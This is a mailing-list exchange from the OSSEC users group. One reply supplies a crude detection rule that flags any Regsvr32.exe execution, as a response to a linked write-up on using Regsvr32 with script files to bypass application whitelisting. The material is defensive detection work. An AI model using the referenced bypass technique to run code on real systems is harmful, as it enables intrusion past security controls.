Interesting.. thanks for that blog post. COM+ lol, classic! anyhow, here is a crude one but it works.. ;-)
<rule id="182675" level="12"> <if_sid>18100</if_sid> <match>Regsvr32.exe</match> <description>Suspicious - "Regsvr32" Capable of application whitelisting bypass.</description> </rule> On Tuesday, April 26, 2016 at 11:37:07 AM UTC-4, [email protected] wrote: > > Hello group, > > Here an interesting article on how Regsvr32.exe can use .com script files > to execute code. I didn’t see a remediation, but it’s good to at least be > aware of it. > > > http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html > > My question is can we write a rule to detect that Regsvr32.exe has been > run? > > Thanks, > > -- --- You received this message because you are subscribed to the Google Groups "ossec-list" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. For more options, visit https://groups.google.com/d/optout.
